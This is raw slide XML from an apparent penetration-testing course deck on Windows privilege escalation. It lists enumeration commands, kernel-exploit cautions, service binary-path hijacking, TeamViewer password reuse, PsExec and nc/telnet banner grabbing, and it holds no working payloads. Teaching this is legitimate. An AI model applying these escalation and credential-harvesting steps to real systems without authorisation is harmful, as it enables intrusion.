              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paths: Kernel Exploit (local), Lateral Movement (Domain)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to see if preventative KBs are installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26766980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2725DC-2814-4185-B420-28D72F1E3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9900CD0-5654-4CDE-B81A-AF3D4DF585AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel Exploits – A Note</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4550CC-05C0-4F4A-8514-932A9672FFA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kernel exploits can destabilize a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should avoid in the real world</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should save for last in OSCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Windows, likely requires cross compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mingw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Wine (windows emulator)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be a frustrating experience	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google and error codes are your friend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33153420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DFA9E-15CB-450B-8BDC-090C32CEA2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CC6299B-97A0-424F-9D1A-548127DCBE88}"/>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A1A96911-9FB7-4EF9-9B7B-49C1B21EF5E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6052449" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find processes and scheduled jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn to spot the abnormal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>schtasks</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(query, qc, config)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>qfe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> product get &lt;fields&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accesschk.exe –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ucqv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;service&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tasklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D4EB8FE-3085-4443-B106-F1F4305D2665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="38852"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6466787" y="2333625"/>
            <a:ext cx="5573870" cy="2800350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C600AB4C-4CE6-4C90-9CF0-3FAF89B1A57B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6466787" y="4627737"/>
            <a:ext cx="5344159"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6473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DFB96-2F62-4351-AB2F-46E2E0C7B7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7FCEE46-15EC-43C2-92EA-D6BEEF3401EB}"/>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22FC054D-9DEA-4170-BC4F-3F3D3D3209A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="970280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key paths: service manipulation, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>installed programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B049186-5477-465F-8EAB-7FF059E6D4BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="737439" y="2441286"/>
            <a:ext cx="10717121" cy="1362265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87089FA2-A86C-4BDE-8B68-4183D3D0F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2265261" y="3803551"/>
            <a:ext cx="7656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TeamViewer version has accessible passwords; passwords often re-used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8480F653-372E-4347-B253-69AB9BD476A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9346532" y="4785698"/>
            <a:ext cx="27377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NOTE: </a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>PSExec</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requires that SMB is accessible</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66F8DDF0-45DB-4637-84DB-4F48A61E4D5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772190" y="4403050"/>
            <a:ext cx="6505575" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7759462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DFB96-2F62-4351-AB2F-46E2E0C7B7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7FCEE46-15EC-43C2-92EA-D6BEEF3401EB}"/>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22FC054D-9DEA-4170-BC4F-3F3D3D3209A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="970280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key paths: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>service manipulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, installed programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87089FA2-A86C-4BDE-8B68-4183D3D0F68D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137224" y="3229116"/>
            <a:ext cx="791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rPr>
              <a:t>winPEAS</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shows I have all access to a service, I can change the binary path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78739CA7-C2F0-453B-943A-9D8D142278BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="1665"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533925" y="1818132"/>
            <a:ext cx="9124150" cy="1390844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{035F361A-D05C-44DA-A470-7CBEC2196870}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2836294" y="3731708"/>
            <a:ext cx="6539880" cy="2536164"/>
            <a:chOff x="2836294" y="3731708"/>
            <a:chExt cx="6539880" cy="2536164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B192E7D-8A45-463F-842D-3E59871554A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2836294" y="3731708"/>
              <a:ext cx="6539880" cy="2536164"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D92ACB97-8C98-4A29-AC57-66D6F53A2730}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3497802" y="5095783"/>
              <a:ext cx="5878372" cy="238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33B896C8-F657-4F01-83AB-B18E060030EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3497802" y="5900467"/>
              <a:ext cx="2867487"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8246551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DFB96-2F62-4351-AB2F-46E2E0C7B7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7FCEE46-15EC-43C2-92EA-D6BEEF3401EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What’s Going On?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22FC054D-9DEA-4170-BC4F-3F3D3D3209A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="970280"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key paths: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>service manipulation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, installed programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83DAE1DB-DCE8-4B92-81A4-3B23745E6E34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2542814" y="2553433"/>
            <a:ext cx="7640116" cy="749620"/>
            <a:chOff x="2286174" y="3710126"/>
            <a:chExt cx="7640116" cy="749620"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{093A6863-B042-4E10-ADCB-5966560BED36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2286174" y="3735745"/>
              <a:ext cx="7640116" cy="724001"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{066D273B-91FB-4652-8C27-9F004B1E4CB1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4123083" y="3710126"/>
              <a:ext cx="5803207"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13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D033179-4E0E-43B0-B2AA-E55CAC310E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3557587" y="3616425"/>
            <a:ext cx="5076825" cy="1495425"/>
            <a:chOff x="3567819" y="4652224"/>
            <a:chExt cx="5076825" cy="1495425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="15" name="Picture 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B51BCBD-EDE9-4968-9F36-F4AFB5376689}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3567819" y="4652224"/>
              <a:ext cx="5076825" cy="1495425"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA26984A-8F0C-4C3C-9072-D3A64DE8A8A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5352474" y="4679777"/>
              <a:ext cx="1882828"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0576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863F8-5F79-4109-809D-BBFFF2647F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10D8F8E-46F0-4DD3-92AC-FAAB70E1A039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bonus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B080B5D2-A428-4C56-B083-77B3AB587F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413582" y="1139672"/>
            <a:ext cx="8263279" cy="1702919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can be used to interact with ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Echo a command into it, or use it interactively</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: Banner grabbing FTP, HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
